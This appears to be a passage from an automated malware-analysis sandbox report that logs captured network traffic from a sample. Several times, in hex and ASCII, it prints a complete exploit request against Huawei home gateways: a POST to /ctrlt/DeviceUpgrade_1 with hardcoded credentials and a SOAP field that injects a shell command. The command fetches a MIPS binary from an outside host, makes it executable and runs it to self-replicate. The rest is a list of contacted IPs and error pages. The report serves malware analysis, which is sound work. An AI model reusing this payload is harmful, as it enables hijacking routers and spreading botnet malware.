72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 112.187.63.32
        Source: unknownTCP traffic detected without corresponding DNS query: 128.3.253.94
        Source: unknownTCP traffic detected without corresponding DNS query: 48.54.54.33
        Source: unknownTCP traffic detected without corresponding DNS query: 35.109.27.19
        Source: unknownTCP traffic detected without corresponding DNS query: 194.149.98.193
        Source: unknownTCP traffic detected without corresponding DNS query: 14.54.227.158
        Source: unknownTCP traffic detected without corresponding DNS query: 182.237.227.245
        Source: unknownTCP traffic detected without corresponding DNS query: 164.38.119.191
        Source: unknownTCP traffic detected without corresponding DNS query: 208.198.27.160
        Source: unknownTCP traffic detected without corresponding DNS query: 65.43.7.75
        Source: unknownTCP traffic detected without corresponding DNS query: 90.118.122.135
        Source: unknownTCP traffic detected without corresponding DNS query: 179.185.195.111
        Source: unknownTCP traffic detected without corresponding DNS query: 107.35.7.79
        Source: unknownTCP traffic detected without corresponding DNS query: 209.13.60.66
        Source: unknownTCP traffic detected without corresponding DNS query: 147.96.199.94
        Source: unknownTCP traffic detected without corresponding DNS query: 216.180.44.194
        Source: unknownTCP traffic detected without corresponding DNS query: 5.115.111.231
        Source: unknownTCP traffic detected without corresponding DNS query: 20.72.225.179
        Source: unknownTCP traffic detected without corresponding DNS query: 120.116.214.230
        Source: unknownTCP traffic detected without corresponding DNS query: 59.240.189.92
        Source: unknownTCP traffic detected without corresponding DNS query: 171.8.72.86
        Source: unknownTCP traffic detected without corresponding DNS query: 168.219.177.216
        Source: unknownTCP traffic detected without corresponding DNS query: 9.131.187.37
        Source: unknownTCP traffic detected without corresponding DNS query: 13.139.91.233
        Source: unknownTCP traffic detected without corresponding DNS query: 133.72.34.1
        Source: unknownTCP traffic detected without corresponding DNS query: 168.115.42.3
        Source: unknownTCP traffic detected without corresponding DNS query: 60.248.199.242
        Source: unknownTCP traffic detected without corresponding DNS query: 68.170.182.235
        Source: unknownTCP traffic detected without corresponding DNS query: 20.44.166.123
        Source: unknownTCP traffic detected without corresponding DNS query: 203.183.187.135
        Source: unknownTCP traffic detected without corresponding DNS query: 206.2.67.238
        Source: unknownTCP traffic detected without corresponding DNS query: 92.241.39.99
        Source: unknownTCP traffic detected without corresponding DNS query: 72.133.56.198
        Source: unknownTCP traffic detected without corresponding DNS query: 71.93.225.238
        Source: unknownTCP traffic detected without corresponding DNS query: 27.183.160.1
        Source: unknownTCP traffic detected without corresponding DNS query: 135.114.251.84
        Source: unknownTCP traffic detected without corresponding DNS query: 117.194.208.208
        Source: unknownTCP traffic detected without corresponding DNS query: 86.129.206.203
        Source: unknownTCP traffic detected without corresponding DNS query: 79.236.30.104
        Source: unknownTCP traffic detected without corresponding DNS query: 191.66.182.135
        Source: unknownTCP traffic detected without corresponding DNS query: 17.241.101.198
        Source: unknownTCP traffic detected without corresponding DNS query: 148.127.200.12
        Source: unknownTCP traffic detected without corresponding DNS query: 118.198.45.70
        Source: unknownTCP traffic detected without corresponding DNS query: 73.147.89.196
        Source: unknownTCP traffic detected without corresponding DNS query: 82.98.174.84
        Source: unknownTCP traffic detected without corresponding DNS query: 13.40.91.202
        Source: unknownTCP traffic detected without corresponding DNS query: 169.111.183.61
        Source: unknownTCP traffic detected without corresponding DNS query: 174.107.245.211
        Source: unknownTCP traffic detected without corresponding DNS query: 201.194.140.182
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:07:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:07:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:07:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:07:48 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 65572e59b8765f5b1f17936c65131ad6.cloudfront.net (CloudFront)X-Amz-Cf-Pop: SIN5-C1X-Amz-Cf-Id: PYF2WcHsrS6rjq5FkaF58ys1QikBVqHpW5618yOpBf-7bC7zAA5qbQ==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 50 59 46 32 57 63 48 73 72 53 36 72 6a 71 35 46 6b 61 46 35 38 79 73 31 51 69 6b 42 56 71 48 70 57 35 36 31 38 79 4f 70 42 66 2d 37 62 43 37 7a 41 41 35 71 62 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.8Date: Mon, 21 Mar 2022 19:07:52 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.15.8</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Mar 2022 19:07:55 GMTServer: ApacheAccept-Ranges: bytesConnection: closeContent-Type: text/htmlData Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 